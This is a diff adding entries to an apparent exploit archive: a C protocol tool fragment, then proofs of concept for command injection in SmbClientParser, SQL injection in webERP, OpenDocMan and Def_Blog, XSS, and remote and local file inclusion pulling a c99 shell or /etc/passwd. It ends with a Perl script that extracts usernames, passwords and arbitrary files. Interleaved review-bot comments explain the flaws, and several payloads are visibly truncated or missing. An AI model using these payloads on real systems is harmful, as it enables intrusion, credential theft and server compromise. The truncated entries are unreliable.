0 : 5, 0, + "gamever", &gamever, + "hostport", &hostport, + NULL, NULL); + + if(gamever) { + retver = atoi(gamever); + } + if(hostport) { + peer->sin_port = htons(atoi(hostport)); + printf("\n- set hostport %hu\n", ntohs(peer->sin_port)); + } + +quit: + close(sd); + return(retver); +} + + + +int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) { + va_list ap; + int i, + args, + found; + u8 **parz, + ***valz, + *p, + *limit, + *par, + *val; + + va_start(ap, rear); + for(i = 0; ; i++) { + if(!va_arg(ap, u8 *)) break; + if(!va_arg(ap, u8 **)) break; + } + va_end(ap); + + args = i; + parz = malloc(args * sizeof(u8 *)); + valz = malloc(args * sizeof(u8 **)); + + va_start(ap, rear); + for(i = 0; i < args; i++) { + parz[i] = va_arg(ap, u8 *); + valz[i] = va_arg(ap, u8 **); + *valz[i] = NULL; + } + va_end(ap); + + found = 0; + limit = data + datalen - rear; + *limit = 0; + data += front; + par = NULL; + val = NULL; + + for(p = data; (data < limit) && p; data = p + 1, nt++) { + p = strchr(data, chr); + if(p) *p = 0; + + if(nt & 1) { + if(!par) continue; + val = data; + printf(" %30s %s\n", par, val); + + for(i = 0; i < args; i++) { + if(!stricmp(par, parz[i])) *valz[i] = val; + } + } else { + par = data; + } + } + + free(parz); + free(valz); + return(found); +} + + + +void fgetz(u8 *data, int len) { + u8 *p; + + fgets(data, len, stdin); + for(p = data; *p && (*p != '\n') && (*p != '\r'); p++); + *p = 0; +} + + + +int calc_authresp(int num) { + if(challenge_fix == 1) return((num * 178) ^ (num >> 16) ^ (num << 16) ^ 0xfe11ae23); // FFOW + return((num * 237) ^ (num >> 16) ^ (num << 16) ^ 0x93fe92ce); +} + + + +int write_unrnum(int num, u8 *buff, int bits) { + int len; + u8 mini[5]; + + len = write_unreal_index(num, mini); + return(write_bitmem(mini, len, buff, bits)); +} + + + +int read_unrnum(int *num, u8 *buff, int bits) { + u8 mini[5]; + + *num = 0; + read_bitmem(buff, 5, mini, bits); + return(bits + (read_unreal_index(mini, num) << 3)); +} + 
+ + +int write_unrser(int num, u8 *buff, int bits, int max) { // forcompability with core.dll + int b; + + for(b = 1; b && (b < max); b <<= 1) { + bits = write_bits((num & b) ? 1 : 0, 1, buff, bits); + } + return(bits); +} + + + +int read_unrser(int *num, u8 *buff, int bits, int max) { // forcompability with core.dll + int b; + + *num = 0; + for(b = 1; b && (b < max); b <<= 1) { + if(read_bits(1, buff, bits)) *num += b; + bits++; + } + return(bits); +} + + + +u8 *unreal_parse_pck(u8 *buff, int size, int *chall) { + static int retfix = 0, + done = 0; + static u8 str[BUFFSZ]; + int b, + len, + pck; + u8 *p; + + if(force_fix) { + retfix = force_fix - 1; // because then it does retfix++ + force_fix = 0; + } + if(chall) *chall = 0; + + read_unrser(&pck, buff, 0, 0x4000); + if(u3fix) { + switch(pck) { + case 0: b = 52; break; + case 1: b = 67; break; + default: b = 52; break; // doesn't work with all the packets + } + } else if(pariahfix) { + switch(pck) { + case 0: b = 66; break; + case 1: b = 81; break; + default: b = 52; break; // doesn't work with all the packets + } + } else { + switch(pck) { + case 0: b = 67; break; + case 1: b = 82; break; + default: b = 52; break; // doesn't work with all the packets + } + } + if(aafix) b++; + if(rvfix) b++; + if(movfix) b++; + size <<= 3; + + /* correct but not necessary, probably in a future implementation + b -= 12; + b = read_unrser(&len, buff, b, 0x1000); + if((b + len) < size) size = b + len; + */ + + while(b < size) { + b = read_unrnum(&len, buff, b); + if((len < 0) || ((b + (len << 3)) > size) || (len > (sizeof(str) - 1))) break; + if(!done) done++; + b = read_bitmem(buff, len, str, b); + str[len] = 0; + if(verbose) printf("\n %s", str); + if(chall) { + p = strstr(str, "CHALLENGE="); + if(p) { + sscanf(p + 10, hex_challenge ? 
"%08X" : "%i", chall); + *chall = calc_authresp(*chall); + } + } + if(strstr(str, "FAIL") || strstr(str, "BRAWL") || strstr(str, "UPGRADE")) { + return(str); + } + } + if(!done) { + retfix++; + if(retfix == 1) return("AAFIX"); + if(retfix == 2) return("U3FIX"); + if(retfix == 3) return("RVFIX"); + if(retfix == 4) return("PARIAHFIX"); + if(retfix == 5) return("MOVFIX"); + if(fast_connect) { + retfix = 0; + fast_connect = 0; + return("NOFIX"); + } + printf("\n" + "Error: seems that this game requires a specific compatibility fix\n" + " try to relaunch this tool another time\n" + "\n"); + exit(1); + } + return(NULL); +} + + + +int unreal_build_pck(u8 *buff, int pck, ...) { + va_list ap; + int i, + b, + sl, + len, + bsize, + val3ff, + val8, + val1000; + u8 *s; + + //devastation is not supported, it uses 0x4000 1 1 0x4000 1 1 1 1 0x3ff 0x1000 + + val8 = 0x08; + if(pariahfix) val8 = 0x4; + + val3ff = 0x3ff; + if(aafix) val3ff = 0x800; + if(rvfix) val3ff = 0x50f; // takes the same number of bits of AA... 
it's useless + + val1000 = 0x1000; + if(movfix) val1000 = 0x1e00; + + b = 0; + b = write_unrser(pck, buff, b, 0x4000); + if(pck == 0) { + b = write_bits(0, 1, buff, b); + b = write_bits(1, 1, buff, b); + b = write_bits(1, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(1, 1, buff, b); + b = write_unrser(0, buff, b, val3ff); + } else if(pck == 1) { + b = write_bits(1, 1, buff, b); + b = write_unrser(0, buff, b, 0x4000); + b = write_bits(0, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(1, 1, buff, b); + b = write_unrser(0, buff, b, val3ff); + } else { // this one is not supported + b = write_bits(1, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_unrser(0, buff, b, val3ff); + } + b = write_unrser(pck + 1, buff, b, 0x400); + b = write_unrser(1, buff, b, val8); // 0 with pck > 1 + bsize = b; + + for(i = 0; i < 2; i++) { // used only for calculating the packet size! it allows to save an additional buffer + va_start(ap, pck); + while((s = va_arg(ap, u8 *))) { + sl = strlen(s) + 1; + if(sl == 1) continue; // skip empty + if(!i && send_verbose) printf("\n^ %s", s); + b = write_unrnum(sl, buff, b); + b = write_bitmem(s, sl, buff, b); // in reality they are index numbers + } + va_end(ap); + + if(!i) b = write_unrser(b - bsize, buff, bsize, val1000); + } + + b = write_bits(1, 1, buff, b); // ??? 
+ + len = b >> 3; + if(b & 7) len++; + if(send_verbose) printf("\n"); + return(len); +} + + + +int read_unreal_index(u8 *index_num, int *ret) { + int len, + result; + u8 b0 = index_num[0], + b1 = index_num[1], + b2 = index_num[2], + b3 = index_num[3], + b4 = index_num[4]; + + if(u3fix) { + *ret = b0 | (b1 << 8) | (b2 << 16) | (b3 << 24); + return(4); + } + + result = 0; + len = 1; + if(b0 & 0x40) { + len++; + if(b1 & 0x80) { + len++; + if(b2 & 0x80) { + len++; + if(b3 & 0x80) { + len++; + result = b4; + } + result = (result << 7) | (b3 & 0x7f); + } + result = (result << 7) | (b2 & 0x7f); + } + result = (result << 7) | (b1 & 0x7f); + } + result = (result << 6) | (b0 & 0x3f); + if(b0 & 0x80) result = -result; + *ret = result; + return(len); +} + + + +int write_unreal_index(int number, u8 *index_num) { + int len, + sign = 1; + + if(u3fix) { + index_num[0] = number & 0xff; + index_num[1] = (number >> 8) & 0xff; + index_num[2] = (number >> 16) & 0xff; + index_num[3] = (number >> 24) & 0xff; + return(4); + } + + if(number < 0) { + number = -number; + sign = -1; + } + + len = 1; + index_num[0] = (number & 0x3f); + if(number >>= 6) { + index_num[0] += 0x40; + index_num[1] = (number & 0x7f); + len++; + if(number >>= 7) { + index_num[1] += 0x80; + index_num[2] = (number & 0x7f); + len++; + if(number >>= 7) { + index_num[2] += 0x80; + index_num[3] = (number & 0x7f); + len++; + if(number >>= 7) { + index_num[3] += 0x80; + index_num[4] = number; + len++; + } + } + } + } + if(sign < 0) index_num[0] += 0x80; + return(len); +} + + + +int read_bitmem(u8 *in, int inlen, u8 *out, int bits) { + for(; inlen--; out++) { + *out = read_bits(8, in, bits); + bits += 8; + } + return(bits); +} + + + +int write_bitmem(u8 *in, int inlen, u8 *out, int bits) { + for(; inlen--; in++) { + bits = write_bits(*in, 8, out, bits); + } + return(bits); +} + + + +int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) { + int retry = 2, + len; + + if(in) { + 
while(retry--) { + fputc('.', stdout); + if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) + < 0) goto quit; + if(!out) return(0); + if(!timeout(sd, 2)) break; + } + } else { + if(timeout(sd, 3) < 0) retry = -1; + } + + if(retry < 0) { + if(!err) return(-2); + printf("\nError: socket timeout, no reply received\n\n"); + exit(1); + } + + fputc('.', stdout); + len = recvfrom(sd, out, outsz, 0, NULL, NULL); + if(len < 0) goto quit; + return(len); +quit: + if(err) std_err(); + return(-1); +} + + + +int timeout(int sock, int secs) { + struct timeval tout; + fd_set fd_read; + + tout.tv_sec = secs; + tout.tv_usec = 0; + FD_ZERO(&fd_read); + FD_SET(sock, &fd_read); + if(select(sock + 1, &fd_read, NULL, NULL, &tout) + <= 0) return(-1); + return(0); +} + + + +u32 resolv(char *host) { + struct hostent *hp; + u32 host_ip; + + host_ip = inet_addr(host); + if(host_ip == INADDR_NONE) { + hp = gethostbyname(host); + if(!hp) { + printf("\nError: Unable to resolv hostname (%s)\n", host); + exit(1); + } else host_ip = *(u32 *)hp->h_addr; + } + return(host_ip); +} + + + +#ifndef WIN32 + void std_err(void) { + perror("\nError"); + exit(1); + } +#endif + + + diff --git a/platforms/multiple/remote/32084.txt b/platforms/multiple/remote/32084.txt new file mode 100755 index 000000000..aa080ba7d --- /dev/null +++ b/platforms/multiple/remote/32084.txt 
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/30290/info
+
+The SmbClientParser Perl module is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Successfully exploiting this issue will allow an attacker to execute arbitrary commands with the privileges of the user running applications that use the module.
+
+Filesys::SmbClientParser 2.7 is vulnerable; other versions may also be affected.
+
+Name a folder the following:
+' x && xterm &#
+
+A shared folder containing this named folder will execute the following command:
+/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc"
\ No newline at end of file
diff --git a/platforms/php/webapps/31989.txt b/platforms/php/webapps/31989.txt
new file mode 100755
index 000000000..5d3a00173
--- /dev/null
+++ b/platforms/php/webapps/31989.txt
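Review bot: The entry shows the injection but never says why the quoting fails, which is the part a reader fixing the module needs: in the last line the folder name is spliced into the single-quoted `-c 'cd "…"'` argument, so the leading `'` of `' x && xterm &#` closes that quote, `&&` runs the attacker's command in the caller's shell, and `#` discards the rest of the smbclient command line. One sentence after the command would make the PoC self-explanatory, e.g. `The leading single quote terminates smbclient's -c argument; everything after && runs as a separate shell command and # comments out the remainder.` The module-side fix this implies is to stop routing the command through a shell (list-form exec) or to escape embedded single quotes — inferred from the command shape shown here, since the module source is not part of this commit.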
@@ -0,0 +1,26 @@
+# ==============================================================
+# Title ...| SQL Injection in webERP
+# Version .| 4.11.3
+# Date ....| 28.02.2014
+# Found ...| HauntIT Blog
+# Home ....| http://www.weberp.org
+# ==============================================================
+
+
+# ==============================================================
+# SQL Injection
+
+------
+POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 391
+
+FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry
+------
+
+
+# ==============================================================
+# More @ http://HauntIT.blogspot.com
+# Thanks! ;)
+# o/
\ No newline at end of file
diff --git a/platforms/php/webapps/32075.txt b/platforms/php/webapps/32075.txt
new file mode 100755
index 000000000..082e84503
--- /dev/null
+++ b/platforms/php/webapps/32075.txt
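Review bot: The request body on the `FormID=` line is two bodies pasted together — a benign URL-encoded copy that ends in `SortBy=`, then a space, then a second decoded copy that carries the injection `SortBy='TADAAAM;]` — so `Content-Length: 391` cannot describe what is shown and it is left to the reader to work out which parameter is the sink. The entry should keep only the second copy and say so explicitly, e.g. `# Vulnerable parameter: SortBy (injected value: 'TADAAAM;])`; whether it lands in an ORDER BY clause, as the name suggests, is not established by this file. It would also help to note that `FormID` is a per-session value and the captured one will not replay as is.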
@@ -0,0 +1,71 @@ +Advisory ID: HTB23202 +Product: OpenDocMan +Vendor: Free Document Management Software +Vulnerable Version(s): 1.2.7 and probably prior +Tested Version: 1.2.7 +Advisory Publication: February 12, 2014 [without technical details] +Vendor Notification: February 12, 2014 +Vendor Patch: February 24, 2014 +Public Disclosure: March 5, 2014 +Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284] +CVE References: CVE-2014-1945, CVE-2014-1946 +Risk Level: High +CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +------------------------------------------------------------------------ +----------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application. + +1) SQL Injection in OpenDocMan: CVE-2014-1945 + +The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. + +The exploitation example below displays version of the MySQL server: + +http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v +ersion%28%29,3,4,5,6,7,8,9 + +2) Improper Access Control in OpenDocMan: CVE-2014-1946 + +The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userâ??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application. + +The exploitation example below assigns administrative privileges for the current account: + +
+ + + + +
+ +------------------------------------------------------------------------ +----------------------- + +Solution: + +Update to OpenDocMan v1.2.7.2 + +More Information: +http://www.opendocman.com/opendocman-v1-2-7-1-release/ +http://www.opendocman.com/opendocman-v1-2-7-2-released/ + +------------------------------------------------------------------------ +----------------------- + +References: + +[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan. +[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP. +[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. + +------------------------------------------------------------------------ +----------------------- + +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/php/webapps/32076.txt b/platforms/php/webapps/32076.txt new file mode 100755 index 000000000..e5a23e625 --- /dev/null +++ b/platforms/php/webapps/32076.txt 
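Review bot: The exploitation example for CVE-2014-1946 is missing: the text says "The exploitation example below assigns administrative privileges for the current account" and is followed only by empty lines, so the access-control issue in `/signup.php` cannot be reproduced from this entry while the SQL injection one can. The missing request (presumably a form or POST against `/signup.php`, given that the text speaks of updating a profile) should be restored from the referenced HTB23202 advisory rather than shipped blank. The mis-encoded apostrophe in `userâ??s` points at the same lossy conversion and should be repaired at the same time.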
@@ -0,0 +1,64 @@ +Advisory ID: HTB23203 +Product: Ilch CMS +Vendor: http://ilch.de +Vulnerable Version(s): 2.0 and probably prior +Tested Version: 2.0 +Advisory Publication: February 12, 2014 [without technical details] +Vendor Notification: February 12, 2014 +Public Disclosure: March 5, 2014 +Vulnerability Type: Cross-Site Scripting [CWE-79] +CVE Reference: CVE-2014-1944 +Risk Level: Medium +CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +------------------------------------------------------------------------ +----------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered vulnerability in Ilch CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users and administrators of vulnerable application. + +1) Cross-Site Scripting (XSS) in Ilch CMS: CVE-2014-1944 + +The vulnerability exists due to insufficient sanitisation of user-supplied data in "text" HTTP POST parameter passed to "/index.php/guestbook/index/newentry" URL. A remote unauthenticated user can send a specially crafted HTTP POST request, which allows to permanently inject and execute arbitrary HTML and script code in userâ??s browser in context of the vulnerable website when the victim visits the "http://[host]/index.php/guestbook/index/index" URL. + +The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word: + +POST /index.php/guestbook/index/newentry HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 151 + +ilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40emai +l.com&homepage=http%3A%2F%2Fsite.com&text=&password=a&B1=Submit \ No newline at end of file diff --git a/platforms/php/webapps/32078.php b/platforms/php/webapps/32078.php new file mode 100755 index 000000000..41730add6 --- /dev/null 
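Review bot: The PoC request has an empty `text=` parameter even though `text` is the parameter the advisory names as the XSS sink, so the payload carrying the `alert()` the text describes was lost, and `Content-Length: 151` no longer matches the body shown; the hunk header announces 64 lines of which far fewer survive. Restore the `text=` value from the HTB23203 advisory. A sentence noting that `ilch_token` is presumably a per-session anti-CSRF token that must be read from the guestbook form first would also save readers from replaying the hard-coded value — this is inferred from the name, not from Ilch source.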
+++ b/platforms/php/webapps/32078.php @@ -0,0 +1,41 @@ +source: http://www.securityfocus.com/bid/30275/info + +Community CMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. + +Community CMS 0.1 is vulnerable; other versions may also be affected. + +> +*[+] +*[+] +*[+] [ Persian Boys Hacking Team ] -:- 2008 -:- IRAN +*[+] - +*[+] - discovered by N3TR00T3R [at] Y! [dot] com +*[+] - communitycms-0.1 Remote File Includion +*[+] - download :http://sourceforge.net/project/showf...roup_id=223968 +*[+] - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph +3r,shayan_cmd +*[+] r00t.master,Dr.root,Pouya_server,Spyn3t,LordKouros h,123qwe,mr.n4ser +*[+] Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ... +*[+] +************************************************** ********************/ +#if register_globals = On; + +$shell="http://localhost/syn99.php?"; // your shell +$target="http://localhost/communitycms/include.php"; //vul page ---> +include.php +echo" + +
+SECURITY : +SHELL : + + + +
+ +"; +?> diff --git a/platforms/php/webapps/32079.txt b/platforms/php/webapps/32079.txt new file mode 100755 index 000000000..6151fd485 --- /dev/null +++ b/platforms/php/webapps/32079.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30284/info + +CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +CreaCMS 1 is vulnerable; other versions may also be affected. + +http://www.example.com/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://127.0.0.1/c99.php? \ No newline at end of file diff --git a/platforms/php/webapps/32080.txt b/platforms/php/webapps/32080.txt new file mode 100755 index 000000000..ee6a46a1a --- /dev/null +++ b/platforms/php/webapps/32080.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30284/info + +CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +CreaCMS 1 is vulnerable; other versions may also be affected. + +http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php? \ No newline at end of file diff --git a/platforms/php/webapps/32081.txt b/platforms/php/webapps/32081.txt new file mode 100755 index 000000000..d19286d1a --- /dev/null +++ b/platforms/php/webapps/32081.txt 
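Review bot: The `echo"…"` block that is supposed to print the exploitation form contains only the `SECURITY :` and `SHELL :` labels — the markup around them, which presumably interpolated `$shell` and `$target`, is gone, so the script as committed prints two labels and submits nothing. Restore the form from the original post; as it stands the two assignments above the `echo` are dead. Separately, `#` starts a comment in PHP, so `#if register_globals = On;` is documentation rather than a check — rewording it as `// only works when register_globals = On on the target` avoids the appearance of a conditional that never runs.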
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30285/info
+
+Lemon CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+Lemon CMS 1.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/lemon_includes/FCKeditor/editor/filemanager/browser/browser.php?dir=../../../../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/32082.txt b/platforms/php/webapps/32082.txt
new file mode 100755
index 000000000..04ea622c1
--- /dev/null
+++ b/platforms/php/webapps/32082.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30289/info
+
+Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Def_Blog 1.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user--
\ No newline at end of file
diff --git a/platforms/php/webapps/32083.txt b/platforms/php/webapps/32083.txt
new file mode 100755
index 000000000..6d0c50c10
--- /dev/null
+++ b/platforms/php/webapps/32083.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30289/info
+
+Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Def_Blog 1.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user--
\ No newline at end of file
diff --git a/platforms/php/webapps/32085.txt b/platforms/php/webapps/32085.txt
new file mode 100755
index 000000000..94d56efed
--- /dev/null
+++ b/platforms/php/webapps/32085.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30292/info
+
+phpFreeChat is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+phpFreeChat 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/demo/demo21_with_hardcoded_urls.php/>'>
\ No newline at end of file
diff --git a/platforms/php/webapps/32087.txt b/platforms/php/webapps/32087.txt
new file mode 100755
index 000000000..a491d852d
--- /dev/null
+++ b/platforms/php/webapps/32087.txt
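Review bot: The phpFreeChat PoC URL ends in `demo21_with_hardcoded_urls.php/>'>`, which is only the tail of an injected tag — the element that was supposed to close the attribute and carry the script is gone, so the line as committed is not a working vector and does not even show which part of the path is reflected. Restore the full URL from BID 30292 so the reflected component is visible.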
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30304/info
+
+EasyBookMarker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+EasyBookMarker 4.0tr is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/32088.pl b/platforms/php/webapps/32088.pl
new file mode 100755
index 000000000..04a29f5d3
--- /dev/null
+++ b/platforms/php/webapps/32088.pl
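Review bot: The PoC itself is missing: the hunk header counts nine lines, but the ninth — the URL that should carry the payload — is empty, presumably because it consisted of markup that was stripped. As committed the entry names no script and no parameter, so it documents nothing a tester or a defender can act on; restore the URL from BID 30304.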
@@ -0,0 +1,210 @@ +source: http://www.securityfocus.com/bid/30305/info + +EasyDynamicPages is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +EasyDynamicPages 3.0tr is vulnerable; other versions may also be affected. + + +#!/usr/bin/perl +#---------------------------------------------------------------- +# +#Script : Easydynamicpages 30tr +# +#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File +Disclosure Exploit ) +# +#Variable Method : GET +# +#Alert : High +# +#---------------------------------------------------------------- +# +#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash +# +#My Offical Website : HTTP://FEREIDANI.IR +# +#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com +# +#---------------------------------------------------------------- +# +#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR +# +#---------------------------------------------------------------- +# +#Script Download : +http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip +# +#---------------------------------------------------------------- +# +#Xss 1 : +http://Example/staticpages/easycalendar/index.php?PageSection=1&month=4&year= +# +#---------------------------------------------------------------- +# +#SQL Injection : +# +#SQL 1 : +http://Example/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/* +# +# +#---------------------------------------------------------------- +# +# Tnx : God +# +# 
HTTP://IRCRASH.COM +# +#---------------------------------------------------------------- + + +use LWP; +use HTTP::Request; +use Getopt::Long; + + + + +sub header +{ +print " +**************************************************** +* Easydynamicpages 30tr Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +****************************************************"; +} + +sub usage +{ + print " +* Usage : perl $0 http://Example/ +**************************************************** +"; +} + + +$url = ($ARGV[0]); + +if(!$url) +{ +header(); +usage(); +exit; +} +if($url !~ /\//){$url = $url."/";} +if($url !~ /http:\/\//){$url = "http://".$url;} +sub xpl1() +{ +$vul = +"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*"; +$requestpage = $url.$vul; + + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + +@password = split(/Password:/,$content); +$password = @password[1]; +@password = split(//,$password); +$password = @password[0]; + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! 
:(\n\n"; +exit; +} + +print "\n Username: ".$name."\n\n"; +print " Password: " .$password."\n\n"; + + +} + + +#XPL2 + +sub xpl2() +{ +print "\n Example For File Address : /home/user/public_html/config.php\n +Or /etc/passwd"; +print "\n Enter File Address :"; +$fil3 = ; + +$vul = +"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*"; +$requestpage = $url.$vul; + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +open (FILE, ">".source.".txt"); +print FILE $name; +close (FILE); +print " File Save In source.txt\n"; +print ""; + +} + +#XPL2 END +#Starting; +print " +**************************************************** +* Easydynamicpages 30tr Exploit * +**************************************************** +*Discovered 